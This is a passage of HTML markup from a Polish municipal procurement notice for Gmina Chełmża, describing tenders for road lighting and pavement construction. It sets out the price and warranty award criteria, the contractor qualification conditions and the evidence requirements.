udzieli zamówienia wykonawcy, którego oferta zostanie uznana za najkorzystniejszą w ramach każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja Części II pod nazwą Budowa oświetlenia drogowego na terenie Gminy Chełmża, stanowiąca część przedsięwzięcia - określonego w Promesie Wstępnej, jako „Inwestycja” - o nazwie: „Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża” i oznaczonego, jako część II. <br/>2.	Zadanie objęte zostanie dofinansowaniem z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych. Dofinansowanie zostanie zrealizowane na podstawie Promesy Wstępnej, którą Zamawiającemu udzielił Bank Gospodarstwa Krajowego przed zawarciem umowy o zamówienie publiczne. Kwota dofinansowania - wskazana w Promesie Wstępnej - wynosi nie więcej niż 7.552.500,00 PLN (słownie: siedem milionów pięćset pięćdziesiąt dwa tysiące pięćset złotych i zero groszy) i dotyczy całego przedsięwzięcia p/n „Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża”.<br/>3.	Zakres robót obejmuje budowę oświetlenia drogowego na terenie Gminy Chełmża:<br/>1)	Przebudowa drogi gminnej polegająca na budowie oświetlenia drogowego, dz. 272/3 obręb Grzywna; <br/>2)	Przebudowa drogi gminnej polegająca na budowie oświetlenia drogowego, dz. nr 230/51, 230/20, 232, 230/13 w obręb Grzywna; <br/>3)	Przebudowa drogi wojewódzkiej nr 551 polegająca na budowie oświetlenia drogowego przy drodze rowerowej zlokalizowanej w pasie drogi wojewódzkiej, obręb 0018 Nowa Chełmża dz. 88/3, 89/1, 87, 90/1, obręb 09 Chełmża dz. 359;<br/>4)	Przebudowa drogi wojewódzkiej nr 551 polegająca na budowie oświetlenia drogowego przy drodze rowerowej zlokalizowanej w pasie drogi wojewódzkiej, dz. 101/15, 103/1 obręb 0017 Nawra i dz. 49/4 obręb 0003 Bogusławki; <br/>5)	Przebudowa drogi powiatowej 1638 C polegająca na budowie oświetlenia drogowego dz. 49 obręb Grzegorz; <br/>6)	Przebudowa drogi powiatowej polegająca na budowie oświetlenia drogowego, dz. 61/2 obręb 0005 Browina; <br/>7)	Przebudowa drogi gminnej polegająca na budowie oświetlenia drogowego, dz. 54, 62/5, 65/1, 66/6 obręb 0011 Grzywna;<br/>8)	Przebudowa drogi wojewódzkiej nr 499 i drogi powiatowej nr 2026 C polegająca na budowie oświetlenia drogowego, dz. nr 113, 12/13, 112/2 i 132/47 obręb Sławkowo;<br/>9)	Przebudowa drogi gminnej polegająca na budowie oświetlenia drogowego, dz. nr 24/81 i 24/99 – obręb Zalesie; <br/>10)	Przebudowa drogi polegająca na budowie oświetlenia drogowego ścieżki pieszo rowerowej wzdłuż DW 551, dz. nr 3/29, 11/1, 14/16, 55/1 – obręb Dźwierzno;<br/>11)	Przebudowa drogi polegająca na budowie oświetlenia drogowego przy drodze wewnętrznej, gminnej na dz. nr 104 obręb Grzegorz; <br/>12)	Przebudowa drogi polegająca na budowie oświetlenia drogowego przy drodze wewnętrznej, dz. nr 61 w Nawrze; <br/>13)	Przebudowa drogi polegająca na budowie oświetlenia drogowego przy drodze wewnętrznej w Bielczynach, dz. nr 102/1, 117, 114 – obręb Bielczyny: <br/>14)	Przebudowa drogi polegająca na budowie oświetlenia drogowego przy drodze wewnętrznej, dz. nr 131 obręb Głuchowo; <br/>15)	Przebudowa drogi polegająca na budowie oświetlenia drogowego, dz. nr 223/3 – obręb Kończewice; <br/>16)	Przebudowa drogi polegająca na budowie oświetlenia drogowego wzdłuż drogi powiatowej DP2019 C Kończewice - Warszewice, dz. nr 67/1, 66/3, 57/2, 56/9, 56/7, 56/5 obręb Kończewice; <br/>17)	Przebudowa drogi polegająca na budowie oświetlenia drogowego przy drodze gminnej nr 100582 C, na dz. nr 195 i 200/3 obręb Kończewice. <br/>i opisany został w załącznik Nr 1 do umowy - Część II zamówienia pn.: Budowa oświetlenia drogowego na terenie Gminy Chełmża w ramach zadania pn.: Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża.<br/>4.	Przedmiot zamówienia należy wykonać zgodnie z postanowieniami umowy, specyfikacją warunków zamówienia zwaną również „SWZ”, złożoną ofertą, zasadami sztuki budowlanej i wiedzy technicznej, obowiązującymi normami, przepisami i technologiami producentów materiałów i urządzeń zastosowanych przy realizacji zamówienia oraz z:<br/>1)	dokumentacją projektową dla każdego budowanego oświetlenia opisaną w załączniku Nr 1,; <br/>2)	zaświadczeniem Starosty Toruńskiego i Wojewody Kujawsko-Pomorskiego dla każdego budowanego oświetlenia wymienionym w załączniku Nr 1;<br/>3)	specyfikacją techniczną wykonania i odbioru robót dla każdej budowanego oświetlenia wymienioną w Załączniku Nr 1.<br/>5.	Zakres robót w ramach ustalonego wynagrodzenia i zakresu określonego w ust. 3 obejmuje dla każdej budowanego oświetlenia: <br/>1)	wykonanie projektu organizacji ruchu na czas budowy oraz dojazdów do domów i pól w zakresie niezbędnym do prowadzenia robót objętych umową wraz z niezbędnymi uzgodnieniami oraz poniesienie kosztów związanych zajęciem pasa drogowego – jeżeli zostaną naliczone; <br/>2)	obsługę geodezyjną polegającą na wytyczeniu przebiegu każdego budowanego oświetlenia;<br/>3)	geodezyjną inwentaryzację powykonawczą wraz ze sporządzoną w jej wyniku dokumentacją geodezyjno- kartograficzną z pomiarów ( mapa zasadnicza 1:500 lub 1:500 obejmującą cały zakres robót), złożenie w Powiatowym Ośrodku Dokumentacji Geodezyjno- Kartograficznej w Toruniu i przekazanie potwierdzonej kopii Zamawiającemu przy odbiorze;<br/>4)	naprawienie urządzeń melioracyjnych oraz niezinwentaryzowanych urządzeń podziemnych zniszczonych w trakcie prowadzonych robót;<br/>5)	uporządkowanie pozostałej części terenu w granicach własności działek stanowiących drogę;<br/>6)	wykonanie pomiarów i badań instalacji elektrycznej;<br/>7)	sporządzenie i skompletowanie dokumentacji powykonawczej, w dwóch egzemplarzach dla każdego budowanego oświetlenia oraz na wcześniej zgłoszone żądanie Zamawiającego kosztorysu powykonawczego;<br/>8)	inne prace związane z procesem budowy.<br/>6.	UWAGA : W przypadku braku możliwości podłączenia wybudowanego oświetlenia do sieci elektroenergetycznej będącej własnością Energa-Operator S.A. z uwagi na brak przyłącza, zamawiający dopuszcza uruchomienie oświetlenia za pomocą zewnętrznego źródła prądu ( np. agregatu prądotwórczego) i wykonanie na tej podstawie pomiarów kontrolnych. Jednocześnie zobowiązuje się Wykonawcę do dokonania podłączenia do sieci elektroenergetycznej po wybudowaniu przyłącza przez Energa-Operator S.A. w terminie 7 dni od powiadomienia przez Zamawiającego oraz dokonanie pomiarów, o których mowa w ust. 5 pkt 6 w ramach udzielonej gwarancji. Powyższe nie ma wpływu na dokonanie odbioru końcowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) cena (C) – waga kryterium 60%;<br/>2) okres gwarancji (G) – waga kryterium 40%.<br/><br/>Obowiązują takie same kryteria dla każdej części – dotyczy każdego kryterium.<br/>Ocena ofert (częsciowych) będzie dokonywana oddzielnie dla każdej części.<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/><br/>Ad 1. Cena <br/><br/>Cena oferty (Cn) – oferta z najniższą ceną otrzyma maksymalną ilość punktów = 100, pomnożone przez współczynnik 0,60; oferty następne będą oceniane na zasadzie proporcji w stosunku do oferty najtańszej, wg wzoru <br/><br/>Cn = C of. n. /C of. b. x 100 x 0,60 <br/>gdzie:<br/>Cn - liczba punktów za kryterium cena;<br/>C of.n. - cena oferty najkorzystniejszej;<br/>C of.b. - cena oferty badanej.<br/><br/>Ad 2. Okres gwarancji <br/><br/>Uwaga! <br/>1)	Zaoferowany okres gwaracji jest tożsamy z zaoferowanym okresem rękojmi. Okres rękojmii zostaje więc rozserzony analogicznie do zaoferowanego okresu gwarancjii;<br/>2)	Minimalny okres gwarancji wynosi 36 miesięcy od daty odbioru końcowego przedmiotu zamówienia; <br/>3)	Maksymalny okres gwarancji dla oceny oferty wynosi 60 miesięcy od daty odbioru końcowego przedmiotu zamówienia;<br/>4)	Jeżeli którykolwiek wykonawca zaoferuje okres gwarancji dłuższy niż maksymalny podany przez zamawiającego, otrzyma liczbę punktów taką, jak przewidziano dla maksymalnego okresu gwarancji;<br/>5)	Jeżeli którykolwiek z Wykonawców w ofercie wskaże okres krótszy niż minimalny okres gwarancji (36 miesięcy), oferta taka będzie podlegała odrzuceniu.<br/>6)	Brak w ofercie wpisu dotyczący długości okresu gwarancji, będzie traktowany przez Zamawiającego jako minimalny 36 miesięczny okres gwarancji.<br/> <br/>Okres gwarancji (G) – oferta z najdłuższym terminem gwarancji otrzyma maksymalną ilość punktów = 100, pomnożone przez współczynnik 0,40; oferty następne będą oceniane na zasadzie proporcji w stosunku do oferty z najdłuższym okresem gwarancji, wg wzoru: <br/><br/>G = G of. b. /G. of. z najdłuższym zaoferowanym okresem gwarancji x 100 x 0,40 <br/>gdzie:<br/>G - liczba punktów za kryterium okres gwarancji; <br/>G of.b. - okres gwarancji oferty badanej;<br/>G of.n. - okres gwarancji oferty z najdłuższym zaoferowanym okresem gwarancji.<br/><br/>Oferta (częściowa) najkorzystniejsza, to oferta (częściowa) która otrzyma najwyższą liczbę punków stanowiącą sumę punktów przyznanych w ramach każdego z kryteriów <br/>i w ramach danej części. <br/><br/>O = Cn + G <br/>O - ocena oferty w punktach (suma);<br/>Cn - liczba punktów za kryterium cena; <br/>G - liczba punktów za kryterium okres gwarancji.<br/><br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. Zamawiający udzieli zamówienia wykonawcy, którego oferta zostanie uznana za najkorzystniejszą w ramach każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja Części III pod nazwą Budowa chodników na terenie Gminy Chełmża, stanowiąca część przedsięwzięcia - określonego w Promesie Wstępnej, jako „Inwestycja” - o nazwie: „Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża” i oznaczonego, jako część III. <br/>2.	Zadanie objęte zostanie dofinansowaniem z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych. Dofinansowanie zostanie zrealizowane na podstawie Promesy Wstępnej , którą Zamawiającemu udzielił Bank Gospodarstwa Krajowego przed zawarciem umowy o zamówienie publiczne. Kwota dofinansowania - wskazana w Promesie Wstępnej - wynosi nie więcej niż 7.552.500,00 PLN (słownie: siedem milionów pięćset pięćdziesiąt dwa tysiące pięćset złotych i zero groszy) i dotyczy całego przedsięwzięcia p/n „Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża”.<br/>3.	Zakres robót obejmuje budowę chodników na terenie Gminy Chełmża: <br/>1)	Chodnik 1 w ramach Części III zamówienia - Budowa chodnika przy drodze wewnętrznej w miejscowości Głuchowo na odcinku o długości 140 mb;<br/>2)	Chodnik 2 w ramach Części III zamówienia - Budowa chodnika przy Jeziorze Głuchowskim na działce nr 125 w obrębie ewidencyjnym Głuchowo - etap II w km od 0+000 do 0+720 na odcinku o długości 720 mb;<br/>3)	Chodnik 3 w ramach Części III zamówienia - Budowa chodnika przy drodze gminnej nr 100531 C w m. Nowa Chełmża na odcinku o długości 558 mb<br/>i opisany został w załącznik Nr 1 do umowy - Część III zamówienia pn.: Budowa chodników na terenie Gminy Chełmża w ramach zadania pn.: Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża.<br/>4.	Przedmiot zamówienia należy wykonać zgodnie z postanowieniami umowy, specyfikacją warunków zamówienia zwaną również „SWZ”, złożoną ofertą, zasadami sztuki budowlanej i wiedzy technicznej, obowiązującymi normami, przepisami i technologiami producentów materiałów i urządzeń zastosowanych przy realizacji zamówienia oraz z:<br/>1)	dokumentacją projektową dla każdego chodnika opisaną w załączniku Nr 1, uwzględniającą rozwiązania ułatwiające dostęp do obiektów przez osoby niepełnosprawne; <br/>2)	zaświadczeniem i pozwoleniem Starosty Toruńskiego dla każdego chodnika wymienionymi w załączniku Nr 1;<br/>3)	specyfikacją techniczną wykonania i odbioru robót dla każdego chodnika wymienioną w załączniku Nr 1.<br/>5.	Zakres robót w ramach ustalonego wynagrodzenia i zakresu określonego w ust. 3 obejmuje dla każdego chodnika: <br/>1)	wykonanie projektu organizacji ruchu na czas budowy w zakresie niezbędnym do prowadzenia robót objętych umową wraz z niezbędnymi uzgodnieniami i decyzjami umożliwiający dojazd do domów i pól oraz poniesienie kosztów związanych z zajęciem pasa drogowego- jeżeli zostaną naliczone; <br/>2)	obsługę geodezyjną polegającą na wytyczeniu przebiegu każdego budowanego chodnika;<br/>3)	geodezyjną inwentaryzację powykonawczą każdego chodnika wraz ze sporządzoną w jej wyniku dokumentacją geodezyjno-kartograficzną z pomiarów (mapa zasadnicza 1:500 lub 1:1000 obejmującą cały zakres robót), złożenie w Powiatowym Ośrodku Dokumentacji Geodezyjno-Kartograficznej w Toruniu i przekazanie potwierdzonej kopii Zamawiającemu przy odbiorze;<br/>4)	naprawienie urządzeń melioracyjnych oraz niezinwentaryzowanych urządzeń podziemnych zniszczonych w trakcie prowadzonych robót; <br/>5)	uporządkowanie pozostałej części terenu w granicach własności działek stanowiących drogę/chodnik; <br/>6)	sporządzenie dokumentacji powykonawczej, opisanej i skompletowanej w dwóch egzemplarzach dla każdego chodnika oraz na wcześniej zgłoszone żądanie Zamawiającego kosztorysu powykonawczego; <br/>7)	inne prace związane z procesem budowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34953300-5 - Chodniki</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) cena (C) – waga kryterium 60%;<br/>2) okres gwarancji (G) – waga kryterium 40%.<br/><br/>Obowiązują takie same kryteria dla każdej części – dotyczy każdego kryterium.<br/>Ocena ofert (częsciowych) będzie dokonywana oddzielnie dla każdej części.<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/><br/>Ad 1. Cena <br/><br/>Cena oferty (Cn) – oferta z najniższą ceną otrzyma maksymalną ilość punktów = 100, pomnożone przez współczynnik 0,60; oferty następne będą oceniane na zasadzie proporcji w stosunku do oferty najtańszej, wg wzoru <br/><br/>Cn = C of. n. /C of. b. x 100 x 0,60 <br/>gdzie:<br/>Cn - liczba punktów za kryterium cena;<br/>C of.n. - cena oferty najkorzystniejszej;<br/>C of.b. - cena oferty badanej.<br/><br/>Ad 2. Okres gwarancji <br/><br/>Uwaga! <br/>1)	Zaoferowany okres gwaracji jest tożsamy z zaoferowanym okresem rękojmi. Okres rękojmii zostaje więc rozserzony analogicznie do zaoferowanego okresu gwarancjii;<br/>2)	Minimalny okres gwarancji wynosi 36 miesięcy od daty odbioru końcowego przedmiotu zamówienia; <br/>3)	Maksymalny okres gwarancji dla oceny oferty wynosi 60 miesięcy od daty odbioru końcowego przedmiotu zamówienia;<br/>4)	Jeżeli którykolwiek wykonawca zaoferuje okres gwarancji dłuższy niż maksymalny podany przez zamawiającego, otrzyma liczbę punktów taką, jak przewidziano dla maksymalnego okresu gwarancji;<br/>5)	Jeżeli którykolwiek z Wykonawców w ofercie wskaże okres krótszy niż minimalny okres gwarancji (36 miesięcy), oferta taka będzie podlegała odrzuceniu.<br/>6)	Brak w ofercie wpisu dotyczący długości okresu gwarancji, będzie traktowany przez Zamawiającego jako minimalny 36 miesięczny okres gwarancji.<br/> <br/>Okres gwarancji (G) – oferta z najdłuższym terminem gwarancji otrzyma maksymalną ilość punktów = 100, pomnożone przez współczynnik 0,40; oferty następne będą oceniane na zasadzie proporcji w stosunku do oferty z najdłuższym okresem gwarancji, wg wzoru: <br/><br/>G = G of. b. /G. of. z najdłuższym zaoferowanym okresem gwarancji x 100 x 0,40 <br/>gdzie:<br/>G - liczba punktów za kryterium okres gwarancji; <br/>G of.b. - okres gwarancji oferty badanej;<br/>G of.n. - okres gwarancji oferty z najdłuższym zaoferowanym okresem gwarancji.<br/><br/>Oferta (częściowa) najkorzystniejsza, to oferta (częściowa) która otrzyma najwyższą liczbę punków stanowiącą sumę punktów przyznanych w ramach każdego z kryteriów <br/>i w ramach danej części. <br/><br/>O = Cn + G <br/>O - ocena oferty w punktach (suma);<br/>Cn - liczba punktów za kryterium cena; <br/>G - liczba punktów za kryterium okres gwarancji.<br/><br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. Zamawiający udzieli zamówienia wykonawcy, którego oferta zostanie uznana za najkorzystniejszą w ramach każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w niniejszej SWZ oraz spełniają określone przez zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/> zamawiający nie stawia warunku w powyższym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>zamawiający nie stawia warunku w powyższym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej:<br/> zamawiający nie stawia warunku w powyższym zakresie;<br/>4) zdolności technicznej lub zawodowej:<br/><br/>dla Części I – wykonawca spełni warunek, jeżeli wykaże wykonanie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, roboty budowlanej lub robót budowlanych polegającej / polegających lub między innymi polegających na budowie, i/lub rozbudowie, i/lub przebudowie, i/lub remoncie: chodnika, i/lub drogi rowerowej, i/lub ścieżki rowerowej, i/lub ciągu pieszo-rowerowego, i/lub ścieżki pieszo-rowerowej, i/lub ciągu pieszego, i/lub ulicy, i/lub drogi, i/lub placu/parkingu o nawierzchni utwardzonej, o wartości lub łącznej wartości tych robót nie mniejszej niż 450 000,00 zł brutto. <br/><br/>Uwaga: W przypadku składania oferty na część I i III, Zamawiający uzna warunek za spełniony, także w przypadku gdy wykonawca wykaże te same roboty w części I jak i w części III . <br/><br/>dla Części II – wykonawca spełni warunek, jeżeli wykaże wykonanie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, roboty budowlanej lub robót budowlanych polegającej / polegających lub między innymi polegających na budowie, i/lub rozbudowie, i/lub przebudowie, i/lub remoncie: oświetlenia zewnętrznego i/lub oświetlenia drogowego i/lub oświetlenia ulicznego, o wartości lub łącznej wartości tych robót nie mniejszej niż 250 000,00 zł brutto.<br/><br/> dla Części III – wykonawca spełni warunek, jeżeli wykaże wykonanie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, roboty budowlanej lub robót budowlanych polegającej / polegających lub między innymi polegających na budowie, i/lub rozbudowie, i/lub przebudowie, i/lub remoncie: chodnika, i/lub drogi rowerowej, i/lub ścieżki rowerowej, i/lub ciągu pieszo-rowerowego, i/lub ścieżki pieszo-rowerowej, i/lub ciągu pieszego, i/lub ulicy, i/lub drogi, i/lub placu/parkingu o nawierzchni utwardzonej, o wartości lub łącznej wartości tych robót nie mniejszej niż 450 000,00 zł brutto. <br/><br/>Uwaga: W przypadku składania oferty na część I i III, Zamawiający uzna warunek za spełniony, także w przypadku gdy wykonawca wykaże te same roboty w części I jak i w części III .<br/>3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnienie warunku wiedzy i doświadczenia musi wykazać jeden z wykonawców składających ofertę wspólną (np. jeden z członków konsorcjum). <br/>4. Jeżeli Wykonawca wykonał zamówienie w walutach obcych, Zamawiający przeliczy ich wartość przyjmując średni kurs PLN od tej waluty podanej przez NBP na dzień opublikowania ogłoszenia zamówienia w Biuletynie Zamówień Publicznych.<br/>5. Oceniając zdolność techniczną lub zawodową zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty wykonawca zobowiązany jest dołączyć oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 PZP (wzór oświadczenia stanowi załącznik 3 do SWZ); <br/>2. Oświadczenie, o którym mowa w ust. 1 stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o którym mowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wspólnie ubiegających się o zamówienie wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 PZP, także oświadczenie podmiotu udostępniającego zasoby (wzór oświadczenia stanowi załączniki nr 5 do SWZ), potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe składane na wezwanie Zamawiającego.<br/>1) Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1.1)	w celu potwierdzenia spełnienia warunków udziału w postępowaniu wykonawca złoży wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (wzór wykazu robót stanowi załącznik 7 do SWZ); <br/> Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz robót dotyczy tych robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył;<br/>1.2)	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu, wykonawca złoży zamiast podmiotowych środków dowodowych, oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego.<br/> Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia także oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego - podmiotu udostępniającego zasoby.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span 